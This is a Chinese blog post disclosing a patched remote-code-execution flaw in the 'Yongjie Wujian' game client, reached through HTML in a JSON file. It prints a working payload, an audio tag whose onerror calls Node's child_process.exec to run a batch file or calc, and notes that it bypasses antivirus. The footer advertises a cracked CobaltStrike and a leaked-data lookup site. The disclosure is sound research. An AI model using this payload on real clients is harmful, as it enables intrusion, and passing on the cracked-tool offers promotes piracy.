其他
《永结无间》客户端RCE漏洞
距离发现这个漏洞已经一年多了,是去年在打游戏的时候突发奇想挖到了这个洞。
这个漏洞现在已经修复了,遂把他公开出来给大家学习一下。其实蛮简单的~~~
(PS:本文单纯讲漏洞。不涉及实战利用)
正文
该漏洞产生文件在这个路径
该 json
文件中有调用到 html
代码的应该都可以触发该漏洞。这里我用上图这个地方来演示
<audio src=x onerror=require('child_process').exec('1.bat');><audio src=x onerror=require('child_process').exec('calc');>
先建个低权限用户(实战利用一个 bat
就足够咯。我为了展示效果就先手动加一下了)
建一个 bat
文件
点击这个地方就能触发了(真实情况下不会只能点击这里。Json
里还有更新之类的地方可以自动触发的!我是就拿了这个来演示)
而且利用该漏洞还能完美的绕过了火绒等杀软的拦截(其实就跟白进程+黑 dll
意思差不多)
我把视频放在了百度网盘里:
链接: https://pan.baidu.com/s/131L8BlRS_nzDUVniethORg?pwd=fukg
提取码: fukg
附上CNVD证书
本文作者:YanXia
原文地址:https://535yx.cn/index.php/archives/1339/
关注公众号后台回复 0001
领取域渗透思维导图,0002
领取VMware 17永久激活码,0003
获取SGK地址,0004
获取在线ChatGPT地址,0005
获取 Windows10渗透集成环境,0006
获取 CobaltStrike 4.9.1破解版
加我微信好友,邀请你进交流群
往期推荐
备用号,欢迎关注